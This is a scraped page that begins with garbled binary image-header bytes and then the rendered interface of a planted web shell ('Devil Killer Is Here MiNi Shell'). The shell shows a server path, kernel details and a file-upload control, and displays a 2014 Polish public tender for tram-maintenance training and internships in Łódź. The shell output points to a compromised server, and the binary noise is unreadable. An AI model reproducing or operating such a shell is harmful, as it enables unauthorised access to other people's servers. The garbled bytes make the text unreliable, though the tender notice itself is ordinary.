JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20141014/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20141014/341016-N-2014.html

<p class="kh_header"><b>Łódź: Przeprowadzenie usług szkoleniowych, zajęć pozalekcyjnych oraz stażu i praktyk zawodowych (umiejętności obsługi i eksploatacji taboru tramwajowego). Zamówienie podzielono na jedenaście części, od 1 do 11.</b><br>
<b>Numer ogłoszenia: 341016 - 2014; data zamieszczenia: 14.10.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Łódzkie Centrum Doskonalenia Nauczycieli i Kształcenia Praktycznego , ul. Kopcińskiego 29, 90-142 Łódź, woj. łódzkie, tel. 042 6783378, faks 042 6780798.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.wckp.lodz.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: jednostka samorządu treytorialnego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przeprowadzenie usług szkoleniowych, zajęć pozalekcyjnych oraz stażu i praktyk zawodowych (umiejętności obsługi i eksploatacji taboru tramwajowego). Zamówienie podzielono na jedenaście części, od 1 do 11..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest zapewnienie uczniom łódzkich szkół możliwości uzyskania umiejętności i kompetencji zwiększających ich szanse na rynku pracy poprzez zorganizowanie stażu, praktyk zawodowych, zajęć szkoleniowych 
i warsztatów technicznych w specjalności obsługi i eksploatacji taboru tramwajowego (na potrzeby lokalnego systemu transportu zbiorowego w Łodzi). 
Usługa realizowana jest w ramach projektu współfinansowanego ze środków Unii Europejskiej pn.: Mechanik Taboru Tramwajowego - ET1. 
Projekt będzie realizowany dla uczniów Zespołu Szkół Ponadgimnazjalnych nr 7 w Łodzi, Zespołu Szkół Ponadgimnazjalnych nr 9 w Łodzi,  Zespołu Szkół Ponadgimnazjalnych nr 22 w Łodzi oraz Zespołu Szkół Technicznych nr 1 
w Łodzi.
Podział zamówienia na części:
Część 1, 2 Wykonanie usługi szkoleniowej polegającej na przeprowadzeniu specjalizacyjnych zajęć mechatronicznych na temat eksploatacji i naprawy taboru tramwajowego. 
Część 3, 4, 5: Zorganizowanie i przeprowadzenie praktyk zawodowych 
w zakładzie pracy lub przedsiębiorstwie zajmującym się, w zakresie prowadzonej działalności gospodarczej, naprawą i eksploatacją pojazdów tramwajowych.
Część 6, 7, 8 i 9: Zorganizowanie i przeprowadzenie staży w zakładzie pracy lub przedsiębiorstwie zajmującym się, w zakresie prowadzonej działalności gospodarczej, naprawą i eksploatacją pojazdów tramwajowych.
Część 10 i 11: Pełnienie funkcji Szkolnych Koordynatorów Zajęć 
i Praktyk/staży.
Zamawiający dopuszcza składanie ofert przez jednego Wykonawcę na nie więcej niż 1 część zamówienia.
Szczegółowy opis przedmiotu zamówienia znajduje się w dziale III SIWZ..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 80.21.00.00-9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 11.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> tak.</p><br>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje żadnych wymagań</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje żadnych wymagań</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie, że Wykonawca dysponuje potencjałem technicznym niezbędnym do wykonania zamówienia, Wykonawca zobowiązany jest załączyć do oferty
Dotyczy części 3-9
a) w zakresie dysponowania potencjałem technicznym Wykonawca składa oświadczenie, iż dysponuje lub będzie dysponował zapleczem i infrastrukturą techniczną wraz ze sprzętem i wyposażeniem niezbędnym do realizacji części
3-9
Oświadczenie składane w formie oświadczenia Oferenta - na własnym formularzu.
UWAGA: Wykonawca zobowiązany jest wskazać w treści ww. oświadczenia miejsce że dysponuje lub będzie dysponował prawem do korzystania z obiektu na cele szkoleniowe związane z realizacją Projektu - z podaniem nazwy i lokalizacji zakładu oraz z potwierdzeniem tego prawa przez osobę reprezentującą dany zakład.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie, że Wykonawca dysponuje osobami zdolnymi do wykonania zamówienia, Wykonawca zobowiązany jest załączyć do oferty:
a) wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług i kontrolę jakości, wraz z informacjami na temat ich doświadczenia i wykształcenia oraz kwalifikacji zawodowych, niezbędnych do wykonania zamówienia, jak również na temat zakresu wykonywanych przez nie czynności.
W celu wykazania spełniania ww. warunku, Zamawiający wymaga wykazania przez Wykonawcę że dysponuje lub będzie dysponował co najmniej: 
Dotyczy części 1-2:
Jedną osobą (dla każdej z części) - specjalistą z zakresu mechaniki, mechatroniki posiadającą wyższe wykształcenie kierunkowe, minimum 5 letnie udokumentowane doświadczenie w zakresie eksploatacji taboru tramwajowego, udokumentowane doświadczenie w pracy z młodzieżą szkolną lub w prowadzeniu kursów zawodowych dla osób dorosłych.  
Dotyczy części 3, 4, 5:
Jedną osobą (dla każdej z części) - instruktorem praktycznej nauki zawodu, posiadającym co najmniej średnie wykształcenie, udokumentowane minimum 3 letnie doświadczenie w pracy w zakresie naprawy i eksploatacji pojazdów tramwajowych, doświadczenie w pracy z młodzieżą szkolną,
Dotyczy części 6, 7, 8, 9:
Jedną osobą (dla każdej z części) - opiekunem stażu, posiadającym co najmniej średnie wykształcenie, minimum 3 letnie doświadczenie w pracy w zakresie naprawy i eksploatacji pojazdów tramwajowych, doświadczenie w pracy z młodzieżą szkolną,
Dotyczy części 10, 11:
Jedną osobą (dla każdej z części) - posiadającą wyższe wykształcenie, znającą specyfikę pracy przedsiębiorstwa zajmującego się eksploatacją i naprawą taboru tramwajowego, posiadającą udokumentowane doświadczenie w prowadzeniu rekrutacji na stanowiska kierowców, motorniczych i pracowników naprawy taboru tramwajowego.
1.Wykonawcy wypełniają załącznik nr 4 do SIWZ z podaniem osoby lub osób którym zostanie powierzona realizacja umowy oraz składają oświadczenie, że te osoby spełniają warunki wymagane dla danej części
Wzór stanowi załącznik numer 4 do SIWZ</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje żadnych wymagań</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Do oferty musi być załączone pełnomocnictwo, o ile prawo do podpisania umowy nie wynika z innych dokumentów złożonych wraz z ofertą.
Przyjmuje się, że pełnomocnictwo do złożenia oferty upoważnia również do poświadczenia za zgodność z oryginałem kopii wszystkich dokumentów składanych wraz z ofertą, chyba, że z treści pełnomocnictwa wynika co innego. 
Pełnomocnictwo składa się w oryginale lub kopii poświadczonej za zgodność 
z oryginałem.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza zmianę treści zawartej umowy w zakresie jej realizacji pod warunkiem, że 
a) wystąpią czynniki zewnętrzne niezależne od Zamawiającego i Wykonawcy, które nie pozwalają na prawidłowe i terminowe wykonanie zamówienia,
b) pojawią się nieprzewidziane oraz niezawinione przez Zamawiającego lub Wykonawcę okoliczności powodujące, iż realizacja Projektu nie może być kontynuowana. 
c) Zamawiający zastrzega możliwość zmiany umowy w zakresie zmiany  terminów płatności w przypadku konieczności dokonania zmiany wynikającej 
z realizacji projektu.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.wckp.lodz.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Łódzkie Centrum Doskonalenia Nauczycieli i Kształcenia Praktycznego 
ul. Kopcińskiego 29, 90 - 142 Łódź.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 22.10.2014 godzina 09:00, miejsce: Łódzkie Centrum Doskonalenia Nauczycieli i Kształcenia Praktycznego 
ul. Kopcińskiego 29, 90 - 142 Łódź
sekretariat pokój nr 209.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Usługa realizowana jest w ramach projektu Mechanik Taboru Tramwajowego - ET1, współfinansowane go ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego Program Operacyjny Kapitał Ludzki, Priorytet IX Działanie 9.2..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Wykonanie usługi szkoleniowej polegającej na przeprowadzeniu specjalizacyjnych zajęć mechatronicznych na temat eksploatacji i naprawy taboru tramwajowego..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Usługa polega na przeprowadzeniu przez wykwalifikowane osoby (posiadające niezbędne doświadczenie i praktykę zawodową oraz wykształcenie) zajęć grupowych dla uczniów łódzkich techników z ww. tematyki z zaangażowaniem w ilości 30 godzin dydaktycznych (dla każdej z grup). Łącznie, przez cały czas trwania umowy, Projekt przewiduje realizację maksymalnie 240 godzin dydaktycznych dla wszystkich grup. Projekt przewiduje prowadzenie szkolenia po podziale uczniów na grupy (dla części 1 i 2 - po 4 grupy po maksymalnie 10 uczniów). Część 1 - 4 grupy uczniów, maksymalnie 120 godzin dydaktycznych Część 2 - 4 grupy uczniów, maksymalnie 120 godzin dydaktycznych Podziału uczniów na grupy dokona Szkolny Koordynator Zajęć i Praktyk. Przewiduje się zorganizowanie zajęć szkoleniowych w taki sposób, aby każda grupa odbyła łącznie 6 zajęć po 5 godzin dydaktycznych jednorazowo w jeden dzień tygodnia. Zajęcia odbywać się będą zgodnie z ustalonym harmonogramem (zostanie opracowany i przekazany Wykonawcy, z którym zostanie zawarta umowa). Harmonogram zostanie opracowany przez Szkolnego Koordynatora Zajęć i Praktyk w porozumieniu z Zamawiającym oraz Dyrekcją szkół w taki sposób, aby w zajęciach mogli uczestniczyć uczniowie uczestniczący w Projekcie bez konfliktu z innymi zajęciami szkolnymi. Zajęcia odbywać się będą w siedzibie Zamawiającego w wyznaczonych pomieszczeniach w godzinach popołudniowych od poniedziałku do piątku. Zajęcia odbywać się będą w godzinach popołudniowych od poniedziałku do piątku. Zajęcia mogą prowadzić jedynie osoby posiadające stosowne wykształcenie i umiejętności o których mowa w Dziale VI ust. 6. Do podstawowych obowiązków Wykonawcy (część 1 i 2) należy: a) przygotowanie, dostarczenie i przeprowadzenie testów zaliczeniowych. O terminach i innych istotnych wymaganiach formalnych dotyczących formy testów, Wykonawca realizujący umowę zostanie poinformowany z odpowiednim wyprzedzeniem. b) dostosowanie przyjętej formy prowadzenia zajęć do możliwości psychofizycznych uczniów uczestniczących w zajęciach. c) prowadzenie zajęć w wyznaczonym terminie oraz zgodnie z Programem, oraz niezależnie od frekwencji uczniów. Wykonawca zobowiązany jest uzyskać pisemną certyfikację Zamawiającego dla przygotowanego Programu przed przystąpieniem do prowadzenia zajęć szkoleniowych d) prowadzenie kart czasu pracy (osób prowadzących szkolenia) zgodnie z wzorem dostarczonym przez Zamawiającego oraz do prowadzenia dzienników zajęć Zamawiający wymaga, by osoby realizujące usługę (prowadzące szkolenia) przestrzegały wytycznych w zakresie kwalifikowania wydatków w ramach POKL, co oznacza, że takie osoby nie mogą świadczyć pracy (rozliczyć roboczogodzin) w ilości przekraczającej 240 godzin w miesiącu (dotyczy to zarówno umów cywilnoprawnych, jak i umów o pracę)...</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.21.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Wykonanie usługi szkoleniowej polegającej na przeprowadzeniu specjalizacyjnych zajęć mechatronicznych na temat eksploatacji i naprawy taboru tramwajowego..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Usługa polega na przeprowadzeniu przez wykwalifikowane osoby (posiadające niezbędne doświadczenie i praktykę zawodową oraz wykształcenie) zajęć grupowych dla uczniów łódzkich techników z ww. tematyki z zaangażowaniem 
w ilości 30 godzin dydaktycznych (dla każdej z grup). Łącznie, przez cały czas trwania umowy, Projekt przewiduje realizację maksymalnie 240 godzin dydaktycznych dla wszystkich grup.  Projekt przewiduje prowadzenie szkolenia po podziale uczniów na grupy (dla części 1 i 2 - po 4 grupy po maksymalnie 10 uczniów). 
Część 1 - 4 grupy uczniów, maksymalnie 120 godzin dydaktycznych
Część 2 - 4 grupy uczniów, maksymalnie 120 godzin dydaktycznych
Podziału uczniów na grupy dokona Szkolny Koordynator Zajęć i Praktyk. Przewiduje się zorganizowanie zajęć szkoleniowych w taki sposób, aby każda grupa odbyła łącznie 6 zajęć po 5 godzin dydaktycznych jednorazowo w jeden dzień tygodnia. 
Zajęcia odbywać się będą zgodnie z ustalonym harmonogramem (zostanie opracowany i przekazany Wykonawcy, z którym zostanie zawarta umowa). Harmonogram zostanie opracowany przez Szkolnego Koordynatora Zajęć i Praktyk w porozumieniu z Zamawiającym oraz Dyrekcją szkół w taki sposób, aby 
w zajęciach mogli uczestniczyć uczniowie uczestniczący w Projekcie bez konfliktu 
z innymi zajęciami szkolnymi. 
Zajęcia odbywać się będą w siedzibie Zamawiającego w wyznaczonych pomieszczeniach w godzinach popołudniowych od poniedziałku do piątku.
Zajęcia odbywać się będą w godzinach popołudniowych od poniedziałku do piątku.
Zajęcia mogą prowadzić jedynie osoby posiadające stosowne wykształcenie 
i umiejętności o których mowa w Dziale VI ust. 6. 
Do podstawowych obowiązków Wykonawcy (część 1 i 2) należy:
a) przygotowanie, dostarczenie i przeprowadzenie testów zaliczeniowych. 
O terminach i innych istotnych wymaganiach formalnych dotyczących formy testów, Wykonawca realizujący umowę zostanie poinformowany z odpowiednim wyprzedzeniem. 
b) dostosowanie przyjętej formy prowadzenia zajęć do możliwości psychofizycznych uczniów uczestniczących w zajęciach.
c) prowadzenie zajęć w wyznaczonym terminie oraz zgodnie z Programem, oraz niezależnie od frekwencji uczniów.
Wykonawca zobowiązany jest uzyskać pisemną certyfikację Zamawiającego dla przygotowanego Programu przed przystąpieniem do prowadzenia zajęć szkoleniowych
d) prowadzenie kart czasu pracy (osób prowadzących szkolenia) zgodnie z wzorem dostarczonym przez Zamawiającego oraz do prowadzenia dzienników zajęć 
Zamawiający wymaga, by osoby realizujące usługę (prowadzące szkolenia) przestrzegały wytycznych w zakresie kwalifikowania wydatków w ramach POKL, co oznacza, że takie osoby nie mogą świadczyć pracy (rozliczyć roboczogodzin) 
w ilości przekraczającej 240 godzin w miesiącu (dotyczy to zarówno umów cywilnoprawnych, jak i umów o pracę)..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.21.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Zorganizowanie i przeprowadzenie praktyk zawodowych 
w zakładzie pracy lub przedsiębiorstwie zajmującym się, w zakresie prowadzonej działalności gospodarczej, naprawą i eksploatacją pojazdów tramwajowych..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Usługa polega na zorganizowaniu warunków i możliwości do przeprowadzenia oraz przeprowadzeniu praktyk zawodowych dla uczniów klas technikum i zasadniczej szkoły zawodowej Zespołu Szkół Ponadgimnazjalnych nr 7 w Łodzi, Zespołu Szkół Ponadgimnazjalnych nr 9 w Łodzi, Zespołu Szkół Ponadgimnazjalnych nr 22 
w Łodzi oraz Zespołu Szkół Technicznych nr 1 w Łodzi. 
Projekt przewiduje zorganizowanie łącznie 400 godzin praktyk (łącznie dla części 3, 4 i 5), prowadzonych przez specjalistów i instruktorów praktycznej nauki zawodu 
w zakresie specyfiki pracy przy naprawie i eksploatacji pojazdów tramwajowych. 
W trakcie praktyk uczniowie mają za zadanie asystować przy pracy w zakresie eksploatacji i naprawy taboru tramwajowego.
Przewiduje się zorganizowanie praktyk w taki sposób, aby każda grupa odbyła łącznie 16 dni praktyk po 5 godzin dydaktycznych jednorazowo (raz w tygodniu) dla każdej z grup.
Praktyki: Zamawiający dokona podziału uczniów na 6 grup po maksymalnie 10 uczniów w taki sposób że:
Część 3 - 2 grupy po 10 uczniów, łącznie 160 godzin dydaktycznych/dwie grupy
Cześć 4 - 2 grupy po 10 uczniów, łącznie 160 godzin dydaktycznych/dwie grupy
Cześć 5 - 1 grupy po 10 uczniów, łącznie 80 godzin dydaktycznych/dwie grupy
Część 6, 7, 8 i 9: Zorganizowanie i przeprowadzenie staży w zakładzie pracy lub przedsiębiorstwie zajmującym się, w zakresie prowadzonej działalności gospodarczej, naprawą i eksploatacją pojazdów tramwajowych.
Usługa polega na zorganizowaniu warunków i możliwości do przeprowadzenia oraz przeprowadzeniu staży dla uczniów klas technikum i zasadniczej szkoły zawodowej Zespołu Szkół Ponadgimnazjalnych nr 7 w Łodzi, Zespołu Szkół Ponadgimnazjalnych nr 9 w Łodzi, Zespołu Szkół Ponadgimnazjalnych nr 22 w Łodzi oraz Zespołu Szkół Technicznych nr 1 w Łodzi. 
Projekt przewiduje zorganizowanie łącznie 150 godzin staży dla 4 grup (części 6, 7, 8 i 9), prowadzonych przez specjalistów i instruktorów praktycznej nauki zawodu w zakresie specyfiki pracy przy naprawie i eksploatacji pojazdów tramwajowych. W trakcie staży uczniowie mają zostać włączeni w bieżący proces produkcyjny z zakresu eksploatacji i naprawy taboru tramwajowego.
